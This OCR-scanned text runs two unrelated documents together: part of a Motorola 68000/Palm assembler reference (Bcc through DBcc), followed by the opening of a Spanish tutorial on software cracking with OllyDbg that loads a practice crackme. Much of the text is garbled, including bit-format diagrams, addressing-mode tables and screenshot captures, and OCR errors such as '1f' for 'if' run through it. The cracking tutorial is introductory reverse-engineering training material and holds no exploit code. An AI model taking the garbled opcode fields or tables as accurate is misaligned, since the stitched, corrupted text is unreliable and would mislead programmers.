L : L/R field. Specifies shift count type. 
O = immediate shift count in CCC field. 
1 = data register count, register in CCC field. 


RRRK : Register field. Specifies any of the 8 data registers whose content is to be shifted. 


Instruction Format (Memory Shifts) 


1] fojojojofo]: pe JEfe je ja faja! 


Instruction Fields 


D : Direction field. Specifies shift direction. 
0 = right shift 
1 = left shift 


EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


Addr 
Mode 


[a > | - | 


Ciao 


12.-Bcc - Branch Conditionally (Also Including BRA) 


Operation * 
IF condition is TRUE 
THEN 
PC +d -> PC 
ELSE 
continue normal sequential operation 


Assembler 
Bcc <LABEL> 


Attributes 
size=Byte, Word 


Description 

The conditional expression specified in the instruction is evaluated and the result tested. If the result is 
TRUE, the displacement is sign-extended to 32 bits and added onto the current value of the program 
counter, at which point program execution continues. If the result is FALSE, program execution 
continues sequentially as normal. 


Possible Instructions 

BT Branch if True (Also BRA, Branch Always) 

BF Branch if False (DOES NOT EXIST:SEE BSR) 
BHI — Branch if Higher (Unsigned) 

BLS — Branch if Lower or Same (Unsigned) 

BCC Branch on Carry Clear (Unsigned) 

BCS Branch on Carry Set (Unsigned) 

BNE Branch if Not Equal (to Zero) (Unsigned and Signed) 
BEQ Branch if Equal (to Zero) (Unsigned and Signed) 
BVC Branch if Overflow Clear 

BVS Branch if Overflow Set 


BPL Branch if Result Plus (N Clear) 

BMI Branch if Result Minus (N Set) 

BGE Branch if Greater Or Equal (to Zero) (Signed) 
BLT  Branchif Less Than (Zero) (Signed) 

BGT Branch if Greater Than (Zero) (Signed) 

BLE Branch if Less Than or Equal (to Zero) (Signed) 


Condition Codes 
Not affected. 


Instruction Format 


pj Ju jo Jeje Je Jefo fotoo fo fo Je Je] 


16-bit 2s complement displacement extension word follows if DDDD... field is zero. 


Instruction Fields 


CCCC : Condition field. Specifies the conditional expression to compute prior to the branch decision. 
Values are given in the conditional branch table at the end of this file. 


DDDD.. : Displacement field. For short (Bcc.S) branch instructions, this field contains the signed (2s 
complement) 8-bit displacement to be added onto the PC if the branch condition holds true. 

For word-sized displacements, the DDDD... field is zero, and the 16-bit signed (2s complement) 
displacement follows the Bcc instruction word as an extension word. This extension word only exists 1f 
the DDDD... field is zero. 


Note: A short branch to the instruction immediately following the Bcc instruction cannot exist. This is 
because the resulting short branch would be zero, and the 68000 would treat this as a signal to access the 
next program word as a displacement for a word-sized conditional branch. This would possibly result in 
an address error exception caused by the next instruction word being odd, and the resulting PC value 
upon the branch execution being odd. Most assemblers issue a warning about such branches. 


13.-BCHG - Test Bit And Change 
Operation * 

NOT (dst(N) ) -> Z 

NOT (dst(N) ) -> dst(N) 


Assembler 
BCHG Dn,<ea> 
BCHG Hnnnmn,<ea> 


Attributes 


size=Byte,Long 
Description 


Copy a bit of the destination operand into 2 temporary locations within the 68000 ALU. invert copy 1, 
and write the result to the Z bit of the CCR. Then invert copy 2, and write the result back into the bit 
position of the destination whence it originated, thus changing the value of the desired bit. If a data 
register is the destination, then the operation is a LONG operation, and the bit position is treated as a 
modulo 32 value, allowing access to all bits of the register. If a memory operand is the destination, then 
the operation is a BYTE operation, and the bit position is treated as a modulo 8 value, allowing access to 
all 8 bits of the BYTE addressed operand. 


Condition Codes 


N — Not Affected. 

V — Not Affected. 

Z — Set 1f the bit tested is ZERO. Cleared otherwise. 
C — Not Affected. 

X — Not affected. 


Instruction Format (Bit Number in Data Register) 


pjoJo for Jr fr]: Jo]: feJefe fa fa Ja] 


Instruction Fields 
RRRK : Register field. Specifies any of the 8 data registers from which the bit position is extracted. 


EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


Addr , 


E a 


A 


Go 27] 
ICI IO INE 


(d8s,PC, 
Xn) 


(Dn is long only, all others are byte only) 


Instruction Format (Bit Number Immediate) 


po Jo of: Jo jojo ol: Jefe] fa Ja a 


Extension Word, Bit Position as Immediate Data 


Instruction Fields 
EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


Addr ¿ 


MIOS AC AE 
EIA 
KEN IENCICI 


DO IE 


H<data> 


IAS METAN 
Caro >] 


(d8s,PC, 
Xn) 


(Dn is long only, all others are byte only) 


14.- BCLR - Test Bit And Clear 


Operation * 
NOT (dst(N] ) -> Z 
0 -> dst(N) 


Assembler 
BCLR Dn,<ea> 
BCLR ¿Hnnnmn,<ea> 


Attributes 
size=Byte,Long 


Description 

Copy a bit of the destination operand into 2 temporary locations within the 68000 ALU. invert copy 1, 
and write the result to the Z bit of the CCR. Then clear copy 2, and write the result back into the bit 
position of the destination whence it originated, thus clearing the desired bit. If a data register is the 
destination, then the operation is a LONG operation, and the bit position is treated as a modulo 32 value, 
allowing access to all bits of the register. If a memory operand is the destination, then the operation is a 
BYTE operation, and the bit position is treated as a modulo 8 value, allowing access to all 8 bits of the 
BYTE addressed operand. 


Condition Codes 


N — Not Affected. 
V — Not Affected. 
Z, — Set 1f the bit tested is ZERO. Cleared otherwise. 
C — Not Affected. 
X — Not affected. 


Instruction Format (Bit Number in Data Register 


ojo Jo fofie Jr fr]: |: Jo JEJEJE fa fa Ja] 


Instruction Fields 
RRRK : Register field. Specifies any of the 8 data registers from which the bit position is extracted. 


EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


Addr Ñ 


An 


dan [10 


ARM IEN 
AECE 
Sl -[ - |] 


(Dn is long only, all others are byte only) 


Instruction Format (Bit Number Immediate) 


Extension Word, Bit Position as Immediate Data 


Instruction Fields 
EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


AA 


XXx),L 111 001 
io JO 


om 1S ME only, all others are byte only) 
15.- BKPT - Breakpoint Instruction (68010) 


Operation * 
Acknowledge breakpoint, then TRAP via illegal instruction exception. 


Assembler 
BKPT +*<data> 


Attributes 
Unsized 


Description 

This instruction causes the 68010 to run a breakpoint acknowledge cycle, with zeros on all address lines. 
Following the termination of the breakpoint acknowledge cycle, the processor then TRAPS via the 
illegal instruction exception. This instruction provides hardware support for debug monitors and real- 
time software emulators. The exact operation of this instruction is implementation dependent. 


Condition Codes 
Not affected. 


Instruction Format 


Ju Jo Jo fr foo Jeje]: Jo Jof fviv IV] 


Instruction Fields 
VVV : Vector field. Specifies the breakpoint number. This can be used by various implementations to 
cause different functions to be executed for different breakpoint types. 


16.- BSET - Test Bit And Set 


Operation * 
NOT (dst(N] ) -> Z 
1 -> dst(N] 


Assembler 
BSET Dn,<ea> 
BSET +nnnn,<ea> 


Attributes 
size=Byte,Long 


Description 

Copy a bit of the destination operand into 2 temporary locations within the 68000 ALU. invert copy 1, 
and write the result to the Z bit of the CCR. Then set copy 2, and write the result back into the bit 
position of the destination whence it originated, thus setting the desired bit. If a data register is the 
destination, then the operation is a LONG operation, and the bit position is treated as a modulo 32 value, 
allowing access to all bits of the register. If a memory operand is the destination, then the operation is a 
BYTE operation, and the bit position is treated as a modulo 8 value, allowing access to all 8 bits of the 
BYTE addressed operand. 


Condition Codes 


N — Not Affected. 

V — Not Affected. 

Z — Set 1f the bit tested is ZERO. Cleared otherwise. 
C — Not Affected. 

X — Not affected. 


Instruction Format (Bit Number in Data Register) 


ojo Jo for Jefe]: JJ feJefefa fa Ja] 


Instruction Fields 
RRRK : Register field. Specifies any of the 8 data registers from which the bit position is extracted. 


EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


AA 


Go 27] 
ICI IO INE 


(d8s,PC, 
Xn) 


(Dn is long only, all others are byte only) 


Instruction Format (Bit Number Immediate) 


poo Jo of: Jo jojo]: fl: JEfeje fa Ja a 


Extension Word, Bit Position as Immediate Data 


Instruction Fields 
EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


Addr ¿ 


MIO ACA ATT 
REA IE 
IES CIN 


DO A 


H<data> 


IAS METAN 
Caro >] 


(d8s,PC, 
Xn) 


(Dn is long only, all others are byte only) 


17.- BSR - Branch to Subroutine 


Operation * 
PC -> (SP) ; PC + d -> PC 


Assembler 
BSR <label> 


Attributes 
size=Byte, Word 


Description 

The long word address of the instruction that immediately follows the BSR instruction is pushed onto 
the system stack. The 2s complement displacement part of the instruction is then sign-extended to 32 
bits, and added onto the program counter. 


Condition Codes 
Not affected. 


Instruction Format 


ojo fojoJo]: Jpop polo jp je! 


16-bit 2s complement displacement word follows if DDDD... field is zero. 


Instruction Fields 
DDDD... : 8-bit displacement field for short branch (BSR.S). For 16-bit word-sized displacements 
contained in an extension word, the DDDD... field is zero. 


Note: A short branch to the instruction immediately following the BSR instruction cannot exist. This 1s 
because the displacement is zero. A zero short displacement would instruct the 68000 to treat the next 
instruction as a word displacement for the BSR instruction, and if the instruction word thus fetched was 
odd, would result in an address error exception immediately after execution. 


18.- BTST - Test Bit 


Operation * 
NOT (dst(N] ) -> Z 


Assembler 
BTST Dn,<ea> 
BTST *Fnnnn,<ea> 


Attributes 
size=Byte,Long 


Description 

Copy a bit of the destination operand into a temporary location within the 68000 ALU. invert the copy, 
and write the result to the Z bit of the CCR. 

If a data register is the destination, then the operation is a LONG operation, and the bit position is treated 
as a modulo 32 value, allowing access to all bits of the register. 

If a memory operand is the destination, then the operation is a BYTE operation, and the bit position is 
treated as a modulo 8 value, allowing access to all 8 bits of the BYTE addressed operand. 


Condition Codes 


N — Not Affected. 

V — Not Affected. 

Z — Set 1f the bit tested is ZERO. Cleared otherwise. 
C — Not Affected. 

X — Not affected. 


Instruction Format (Bit Number in Data Register) 


ojo Jo fofie Jr fr]: JoJo fe Jefe fa fa Ja] 


Instruction Fields 
RRRK : Register field. Specifies any of the 8 data registers from which the bit position is extracted. 


EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


Addr , 


IMEI IONES IEEE 
EN 


CITO IE INE 
ICI] INE INE 


(d8s,PC, 
Xn) 


(Dn is long only, all others are byte only) 


Instruction Format (Bit Number Immediate) 


po Jo of Jo foJo Jo fo JE fee fa Ja fa 


Extension Word, Bit Position as Immediate Data 


Instruction Fields 
EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


Addr ; 


AE RC E 


Cia 


19.- CHK - Check Register Against Bounds 


Operation * 
IF Dn<0 or Dn > sre 
THEN TRAP 


Assembler 
CHK <ea>,Dn 


Attributes 
size=Word 


Description 

The low order word of the specified data register is examined and compared to the upper bound (which 
is specified in the <ea> specification), treated as a 28 complement integer. If the register value is less 
than zero, or greater than the upper bound contained in the source operand, then the 68000 takes the 
CHK exception. Otherwise, instruction execution proceeds normally. 


Condition Codes 


N — Set 1f Dn < 0, Cleared 1f Dn > src, Undefined otherwise. 
V — Undefined. 

Z — Undefined. 

C — Undefined. 

X — Not Affected. 


Instruction Format 


Jj jojo fe fee Jr Y Jo JEJE e fa fa Ja] 


Instruction Fields 
RRRK : Register field. Specifies the data register whose contents are checked. 


EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


Addr : 


E a 


-_ 


Ciao 


20.-CLER - Clear an operand 


Operation * 
0 -> dst 


Assembler 
CLR <ea> 


Attributes 
size=Byte, Word,Long 


Description 
The destination is cleared to all zero bits. The size of the operation may by byte, word or long. 


Condition Codes 


N — Always Cleared. 
V — Always Cleared. 
7, — Always Set. 

C — Always Cleared. 
X — Not Affected. 


Instruction Format 


o jojo ojo]: foJisisfe Jefa fa fa 


Instruction Fields 

SS : Size field. Determines the size of the operation. 
00 = Byte operation 

01 = Word operation 

10 = Long operation 


EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


MIOS ACA ATT 
pa 
IES INICIO IES 


H<data> 


ER] 

ICC INE INE 

(6 O A 
Xn) 


21.- CMP - Compare 


Operation * 
dst - src -> CCR (set condition code bits only) 


Assembler 
CMP <ea>,Dn 


Attributes 
size=Byte, Word,Long 


Description 
Subtract the source operand from the destination operand, but set the condition codes only. The 
destination operand is not changed. The size of the operand may be byte, word or long. 


Condition Codes 


N — Set 1f the result is negative. Cleared otherwise. 

V — Set if an overflow is generated. Cleared otherwise. 
Z, — Set if the result is zero. Cleared otherwise. 

C — Set if a borrow is generated. Cleared otherwise. 

X — Not Affected. 


Instruction Format 


Jo] fr fe Jefe us Ju JE JE Jefa Ja fa] 


Instruction Fields 
RRR : Register field. Specifies the destination data register. 


MMM : Op-mode field. Defined according to: 
Byte Word Long Operation 


000 001 010 Dn - <ea> 


EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


(An: word and long only) 


Note: CMP An,Dn can only be either Word or Long. CMPA is used when the destination is an address 


register. CMPI is used when the source is an immediate operand. CMPM is used for memory to memory 
comparisons. 


Chapter 


Assembler Reference (Referencia Ensamblador Palm) 


Addressing Capabilities 


Addressing Modes 


Instruction Set 


26.-DC 27.-DIVS 28.-DIVU 
31.-EORI to CCR 32.-EORItoSR  33.-EXG 
36.-JMP 37.-JSR 38.-LEA 
41.-MOVE io ÍrOM 43 -MOVE to CCR 
46.-MOVEUSP  47.-MOVEA 8.-MOVEC 
51.-MOVEQ 52.-MOVES 53.-MULS 
56.-NEG 57.-NEGX 58.-NOP 
61.-ORI 62.-ORI to CCR  63.-ORI to SR 
66.-ROL,RROR  67.-ROXL,ROXR 68.-RTD 
71.-RTR 72.-RTS 73.-SBCD 
76.-SUB 77.-SUBA 78.-SUBI 
81.-SWAP 82.-SYSTRAP.—  83.TAS 
86.-TST 87.-UNLK q 


90.-Operation Components 
Abbreviations 


24.-CMPM 
29.-EOR 
34.-EXT 
39.- LINK 


44.-MOVE from 
SR 


49.-MOVEM 
54.-MULU 
59.-NOT 
64.-PEA 
69.-RTE 68000 
74.-Scc 
79.-SUBQ 
84.-TRAP 


25.-DBcc 
30.-EORI 
35.-ILLEGAL 
40.-LSL € LSR 


45.-MOVE to SR 


50.-MOVEP 
55.-NBCD 
60.-OR 
65.-RESET 
70.-RTE 68010 
75.-STOP 
80.-SUBX 
85.-TRAPV 


89.-Condition Code Convention 


22.- CMPA - Compare Address 


Operation * 


dst - src -> CCR (set condition code bits only) 


Assembler 


CMPA <ea>,An 


Attributes 


size=Word,Long 

Description 

Subtract the source operand from the destination operand, but set the condition codes only. The 
destination operand is not changed. The size of the operand may be word or long. 

Note: All Word sized operands are sign extended to 32 bits prior to the comparison operation. 


Condition Codes 


N — Set 1f the result is negative. Cleared otherwise. 
V — Set if an overflow is generated. Cleared otherwise. 
Z, — Set if the result is zero. Cleared otherwise. 


C — Set if a borrow is generated. Cleared otherwise. 


X — Not Affected. 


Instruction Format 


Jo]: fe Jefe Ju pu JE JE Jefa Ja fa] 


IInstruction Fields 


RRRK : Register field. Specifies the destination data register. 
MMM : Op-mode field. Defined according to: 


011 : Word operation. The source operand is sign extended to 32 bits and the operation 
performed upon the entire 32 bits of the address register. 


111 : Long operation. 


EEE/AAA : Specifies the effective address of the <ea> operand. The legal addressing modes are: 


111 011 


(d8,PC, 
Xn) 


23.- CMPI - Compare Immediate 


Operation * 
dst - immediate data -> CCR (set condition code bits only) 


Assembler 
CMPI +nnnn,<ea> 


Attributes 
size=Byte, Word,Long 


Description 
Subtract the source operand from the destination operand, but set the condition codes only. The 
destination operand is not changed. The size of the operand may be byte, word or long. 


Condition Codes 


N — Set 1f the result is negative. Cleared otherwise. 

V — Set if an overflow is generated. Cleared otherwise. 
Z, — Set if the result is zero. Cleared otherwise. 

C — Set if a borrow is generated. Cleared otherwise. 

X — Not Affected. 


Instruction Format 


jojo JoJf: joJo]s js /EJeJE fa Ja fa] 


IInstruction Fields 


SS : Size field. Specifies size of operation. 
00 = Byte operation 01 = Word operation 
10 = Long operation 


EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


7 > 1] 
n)+ n.reg. num 
d8,An, 


An.reg.num 


(An) An.reg.num 
100 
101 


(d8s,PC, 
Xn) 


BBB... : Byte immediate data field. The immediate data is contained here. The WWW... field is set to 
zero (00000000 binary) and the LLL... field does not exist. 
WWW... : Word immediate data field. The immediate data occupies both WWW... and BBB... fields. 


The LLL... field does not exist. 
LLL... : Long immediate data field. The immediate data occupies all BBB, WWW and LLL fields, and 
the long word is divided as follows: 


WWW...BBB... HIGH word of data 


LLL... LOW word of data 


24.- CMPM - Compare Memory 


Operation * 
dst - src -> CCR (set condition code bits only) 


Assembler 
CMPM (Ay)+,(Ax)+ 


Attributes 
size=Byte, Word,Long 


Description 
Subtract the source operand from the destination operand, but set the condition codes only. The 
destination operand is NOT changed. The size of the operand may be byte, word or long. 


Condition Codes 


N — Set 1f the result is negative. Cleared otherwise. 

V — Set if an overflow is generated. Cleared otherwise. 
7 — Set 1f the result is zero. Cleared otherwise. 

C — Set if a borrow is generated. Cleared otherwise. 

X — Not Affected. 


Instruction Format 


joe fe Je Ju fs 5 Jo Jo fr fr fr 


Instruction Fields 


XXX : Register Rx field. ALWAYS specifies the destination register. Specifies an address register AO- 
A7. 


SS : Size field. Specifies the size of the operation. 
00 = Byte operation. 
01 = Word operation. 
10 = Long operation. 


YYY : Register Ry field. Always specifies the source register. Specifies an address register AO-A7, 


25.- DBcc - Test Condition, Decrement and Branch 


Operation * 


IF condition=FALSE 


THEN 
Dn - 1 -> Dn 
IF Dn <> -1 
THEN 
PC +d -> PC 
ELSE 
PC +2 -> PC 
END IF 
ELSE 
PC +2-> PC 
END IF 


Assembler 
DBcc Dn, <label> 


Attributes 
size=Word 


Description 


A complex loop control instruction. The sequence of operations is: 

1) Test condition. If condition is TRUE, fall through to next instruction. 

2) If condition is FALSE, decrement the low word of the data register used as the counter. 

3) If the resulting value of the counter is -1, fall through to next instruction. 

4) If counter value is not -1, sign-extend the displacement to 32 bits, and add it onto the current value of 
the PC. 

The instruction should be read as "Decrement and Branch until condition (is true)", as this best 
summarises the operating logic. 


Possible Instructions (S=signed test, U=unsigned test) 


DBT Until True 

DBF Until False (Also written DBRA) 

DBHI Until Higher (Unsigned) 

DBLS Until Lower or Same (Unsigned) 

DBCC Until Carry Clear (Unsigned) 

DBCS Until Carry Set (Unsigned) 

DBNE Until Not Equal (to Zero) 

DBEO Until Equal (to Zero) 

DBVC Until Overflow Clear 

DBVS Until Overflow Set 

DBPL Until Result Plus (N Clear) 

DBMI Until Result Minus (N Set) 

DBGE Until Greater Or Equal (to Zero?) (Signed) 
DBLT Until Less Than (Zero?) (Signed) 

DBGT Until Greater Than (Zero?) (Signed) 
DBLE Until Less Than or Equal (to Zero?) (Signed) 


Condition Codes 


Not affected. 


Instruction Format 


oJujoJt Jejejeje]: Je jojo]: fee Je] 


16-bit 2s complement displacement follows as extension word. 


Instruction Fields 


CCCC : Condition specifier field. See table of condition code specifiers at the end of this file. 
RRRK : Register field. Specifies which data register DO-D7 to use. 


Notes: When no terminating condition is required for a loop, and the counter decrementing to -1 is the 
sole exit condition required (as in Pascal 'for' loop, etc.) then DBF is used. Two methods of loop entry 
are available. Either the program can fall into the loop, in which case the loop will be executed N+1 
times if the value of Dn upon entry is N, or the program can branch direct to the DBce instruction, in 
which case, for a value of N in Dn, the loop will be executed N times. The latter method is preferred, as 
1t exits consistently for a counter value of O analogously to a Pascal 'for' loop, unless there are good 
reasons for using the former method. 


INTRODUCCION AL CRACKING CON OLLYDBG DESDE 
CERO 


La idea de esta INTRODUCCION AL CRACKING CON OLLYDBG DESDE CERO es la de dar una 
base para todos los que recién se inician en el arte del cracking con OLLYDBG, tratando de ser 
una introducción pero a su vez que proporcione una base fuerte para poder ingresar a la lectura y 
comprensión de tutoriales mas avanzados como los que se encuentran en el actual NUEVO 
CURSO de CRACKSLATINOS, el cual por supuesto sigue abierto para seguir agregando 
novedades, concursos y teorías como hasta ahora. 


La idea se genero a partir de que los newbies actuales que leen el llamado NUEVO CURSO de 
CRACKSLATINOS, se encuentran con que este se inicia en un nivel muy alto, y no pueden 
insertarse gradualmente en el mismo, por lo cual se sienten frustrados y muchas veces abandonan 
antes de empezar, la idea de esta INTRODUCCION es no repetir los grandes tutes que existen en 
ese curso que son ya mas de 500 y de un nivel espectacular, si no mas bien sentar la base para 
que el que termine esta introducción, le sea mas fácil leer cualquier tutorial, obviamente requerirá 
esfuerzo como todo en el cracking, pero la tarea nuestra es tratar de alivianar ese esfuerzo, 
sentando aquí las bases del cracking en OLLYDBG para que sea compresible y se pueda entender 
fácilmente. 


PORQUE OLLYDBG? 


Aquí no entraremos a hacer grandes elucubraciones o reeditar viejas polémicas de SOFTICE vs 
OLLYDBG de cual es mejor ni nada de eso, creo que hasta los fanáticos de SOFTICE reconocen 
que es mas sencillo empezar con OLLYDBG, ya que muestra mayor información y es mas cómodo 
para aprender, la idea es ingresar al mundo del cracking, por la puerta del OLLYDBG, mas 
adelante cuando uno ya conoce, puede trasladar fácilmente a cualquier debugger lo aprendido 
pues cambian las formas de usar de los programas, pero no la esencia. 


LO PRIMERO ES LO PRIMERO 


Exactamente lo primero es munirse de la herramienta que vamos a utilizar mayormente, para ello 
pueden hacer clic AQUÍ para bajarlo. 


ss 


caddons.rar HC 216 


€ 
E 


L. Crackmes... odbg110,zip 


Como aquí estamos empezando desde cero pues, recién nos estamos haciendo del archivo, y 
ahora ya que es un archivo zipeado, lo unzipearemos con WINZIP preferentemente a una carpeta 
en nuestro disco rígido que podamos localizar fácilmente, una buena idea seria poner dicha 
carpeta en C:/ aunque funciona en cualquier lugar, yo la pondré en C./. 


Dirección [se Ca y! Ir 
A 


pa » FTP-Default. log 3 
Tareas del sistema ==| Documento de texto 
(m3 Ocultar el contenido de esta =— 6.216 KB 
z unidad ES HTTP-Defa 
D Agregar o quitar programas ==| Documentd Abrir 
4? Buscar archivos o carpetas ==) 15KkB Abrir con Ulead Photo Explorer 
em HTTP-DRSfa  Pplorar 
Tareas de archivo y carpeta Y ==| Documentd E Extract files... 
=J 1kB EB Extract Here 


PDOXUSRE EB Extract to odbg110%, 


a 
FileMaker R 
Y mec sra [DCopyToDWD 


(E Mis documentos CopyToDWD Depot 
(E Documentos compartidos 
4 Mis sitios de red 83 KB 


Otros sitios 


19 WinUHA: Add To Archive ... 

3 WInUHA: Add To Archive "odbg110.uha" 

(3 WInUHA: Add and Send via Email ... 

39 WinUHA: Add To "odbg110.uha" and Send via Email 


Detalles 


odbg110.zip 
WINRAR ZIP archive 


Fecha de modificación: lunes, 07 de at : — 
noviembre de 2005, 7:06 Dat: BA Scan with Zone Labs Anti-virus 


| 
Tamaño: 1,06 MB vServer bd Abrir con o 
Docu mentq VEStudio (DE-Mail odbg110.zip 


4 DeExtract to... 
Qixtact to here 


Una vez descomprimido podemos entrar a la carpeta y ver 


Q arás > y yo Búsqueda ls Carpetas Ey 


Dirección [E C:dodbg110 


Tareas de archivo y carpeta 


Otros sitios 


is» Disco local (C;) 

(2 Mis documentos 

(ES Documentos compartidos 
9 mec 


Image Helper 


WU Mis sitios de red 
license, bt 
Documento de texto 
Detalles - 4KB 
O OLLYDBG.EXE 
Carpeta de archivos 


OllyDbg, 32-bit analysing debugger 
Fecha de modificación: lunes, 07 de A d eS 
noviembre de 2005, 7:11 


OLLYDBG.HLP 
o de Ayuda 


readme, txt 
Documento de texto 
3 KB 


Allí esta el archivo ejecutable OLLYDBG.exe el cual ejecutaremos para arrancar el OLLYDBG y al 
cual para comodidad le haré un acceso directo en mi escritorio. 


URSO OLLYDBG.EX 
E 


Bueno ya tenemos bajado y preparado para arrancar a nuestro OLLYDBG.exe, lo ejecutamos. 


Old DLL 


2 ) Dynamic link library 'PSAPI.DLL' that resides in OllyDbg directory has lower file version (5.00,1641,1) than 


corresponding DLL in system directory (5.1,2600.2180 (psp_sp2_rtm.040). Delete old library frorn the OllyDbg 
directory? (If necessary, you can restore it later from the original .zip archive) 


Ea 


Nos aparece este cartel avisándonos que la DLL que esta en la carpeta de OLLYDBG es mas 
antigua que la de sistema, si apretamos SI, borrara la antigua de la carpeta del OLLY y usara la de 
sistema, yo a pesar de no ver grandes diferencias siempre prefiero elegir que use la propia antes 
que la de sistema, ya que fue concebido con esa dll, por lo tanto elijo NO. 


OllyDbg 
File View Debug Plugins Options Window Help 


EXE, 


Allí esta el OLLYDBG vacío, y como siempre el primer programa que abriremos mas que nada para 
mirar las diferentes partes del OLLYDBG y a vuelo de pájaro poder ubicarnos en sus diferente 
partes, es el famoso CRACKME DE CRUEHEAD que vendrá adjunto en este tutorial. 


Para abrir el archivo a debuggear en el OLLYDBG, vamos a FILE OPEN o hacemos clic en el icono 


OllyDbg 
File View Debug 


Se abrirá la ventana para que busquemos el archivo a debuggear en este caso es el crackme de 
CRUEHEAD. 


Open 32-bit executable 


Buscar en: [5 DI-Crackme +] e (le Ely 


CRACKME.EXE 


Nombre: — [CRACKME.EXE 
Tipo: | Executable file (*.exe) y ] Cancelar | 


Arguments: | Y ] 


CRACKME.EXE - [CPU - main thread, module CRACKME] Sax 
Flo View Debug Plugins Options Window Hop -0x 


a 
E AA 
Weno, coero 


E: ¡reco 
mE 
( 
Loc 


BE 
E E 
asa ada 
POS 
Ie UE A REO, 


seen 
a 
To need to Gina the code” 


ago reido 
cto: PAR CÉY tala, 
E PORC, 


+ 


Allí se abre el susodicho crackme y por ahora no importa que no entendamos lo que nos muestra 
ya mas adelante aprenderemos eso, la idea es ir mostrando las partes del OLLYDBG y ciertas 
configuraciones del mismo para que cuando en sucesivos tutes, diga, por ejemplo vayan al DUMP, 
sepan al menos donde esta, así que esto es mas que nada para ubicación, no es un tute profundo 
sobre OLLY. 


P 'plodule = Ñ 
ES FFa4000B (CALL <JMP.2KERNEL32. GetModu leHandleñA> Cectñoda leHandleA 
A3 CA204000 — |MOU DWORD PTR DS: [4920CA],EAX 

6A 00 PUSH Q [Els = NULI 

68 F4204000 |PUSH CRACKME. 004929F4 Mo need to disasm the codet” 
Potato oo EL £USER32.FindllindowA> [ess 


OR EAX, EAX 
JE SHORT CRACKME. 8240101D 


RETN 
A a E E nar 
peo 
nl WORD PTR D: 402078 DESENS BL. o 
MOU EAX, DWORD PTR DS: [4920CAJ] 
MOU DWORD PTR DS: [482074], EAX 


He: Fr (5 O 
Dis30008 |CALL <Ohp. Ureibsd LoadIconA> Lo: 
MOU DWORD P 402078], ERX 
0a7Fo0000 Ez a El (5 a ARROW 
LoadCursorA 


ea Sr. Ep AE 
E E 


ASCII "No need to disasm the codet” 
63 64204000 Pl CRACKME. 00492064 Ci la: CRACKME. 00402064 
E o rs TL E 


H 
FF35 CcA204009 DWORD PTR DS: [4920CAJ] ta 
SA aa PUSH O = NULL 
A 00 ISH 8 ent = NULL 
pasa0a0a 8009 Height = 8888 (32768.) 
p0soB000 |PUSH S0u0 Width = 8608 (32768.) 
sE sE E (110, a 


A 
68 B4000008 |PUSH 0B4 4 (180.) 

BOBaCFOo H BCFO00a Style = wWS_! ad podacio di dl MAXIMIZEBOX ¿1IS_S% 
68 E7204000 CRACKME . 0B4920E7 WindowName = "CrackMe v1.0" 
e Epeo4DoS E pa É 7 'No_need to disasm the codet” 

HtSty le = 

cce3aesa |CALL <JMP.$USER32. CreatellindowExA> CreatellindouExA 
IS p4204000 DWORD PTR DS: [402004],EAX 
Sho ate = SW_SHOWNORMAL 


d tod vw 


SO12FEBO 
?C91EB9 ntdll.KiFa: 


7FFD400D 
Peri 


ia 
0920738 ntdll. 


Lt CRACK 


mm 
2 
5 


DN ND DO 


DUFFFFFFFF) 
OLERFERFEE) 

al ) 

OLFFFFFEFF REGISTROS 
7FFOFOBO(FFF) 


Oe 


LastErr ERROR_MOD_NOT_FOUND (9809997E) 
0000246 (NO,NB,E,BE,NS,PE,GE,LE) 
21050104 D00uBaDa 


NO me 
2299393 5 
2unra 


1. bonaccanoonnn00n 
1. E ral 
a 


a 
B| CRACKME. <Modu LeEntryPoint> 
a 


Analysing CRACKME: a 27 calls to known functions 


Allí vemos la cuatro partes de la ventana principal del OLLYDBG 


1)DESENSAMBLADO : 


También llamado listado, aquí el OLLY nos muestra el listado desensamblado del programa que 
vamos a debuggear, por DEFAULT el OLLY viene configurado para analizar el programa que 
vamos a debuggear al iniciar, esto se configura en OPTIONS-DEBUGGING OPTIONS. 


Window Help 
Appearance 


Debugging options Alt+O 
Just-in-time debuggi 


EDebugging 


Security | Debug | Events | Exceptions | Trace | sx | Stings | Addresses | 
Commands l Disasm | cpu | Registers | Stack Analysis 1 | Analysis 2] Analysis 3 | 


Procedure recognition: 
CC Stict 
(+ Heuristical 
(Fuzzy (not recommended for tracing) 


Show ARGs and LOCAL s in procedures 


IV Auto start analysis of main module 


WRecognize loops and switches" 
[” Decode cascaded IFs as switches 


Í” Decode tricky code sequences 
[Y Gray commands that fill gaps between procedures 
ÍV' Keep analysis between sessions 


Undo Cancel 


O sea al estar marcada esa tilde en AUTO START ANALISIS OF MAIN MODULE el OLLYDBG 
analizara el programa y mostrara información adicional sobre el mismo. 


OllyDbg - CRACKME.EXE - [C main thread, module CRACKME] 
[e] File View Debug Plugins Options Window Help 


podu l NI 
L_<JMP. aa no ndlen) GetModu leHandleA 
nd ia PTR ¡BZBCA: 


Titl NULL 
+. 68 F4204000 PUSH ERACKNE. Ba4020F4 [ "No need to disasm the codet” 
o CALL _<JMP. £USERS2.FindilindowA> FindWindowA 


OR EAX,EAX 

eS el PET SHORT CRACKME. 98401010 

C705 64204900 EN DWORD PTR DS: [402064], 4003 
+. C705 68204000 MOU DWORD PTR DS: [402068],CRACKME. lindPr: 
MOU DWORD ER canas E] 
MOU DWORD P* 920707,0 
MOU EAX, Dubno PTR ds: [4026CA1 
MOU DWORD PTR DS: [402074], EAX 
ES ESx 


7] [ 
+. ES D1G30000 ca St. S8USER32.LoadIconA> LoadiconA 
. AS 'D PTR DS: [402078], EAX 
68 Ba7F4BBS Eu zos tame = TDC_ARROW 
6A Ba NULL 
Es Az030008 Caco Somp. E ad deb curecta 
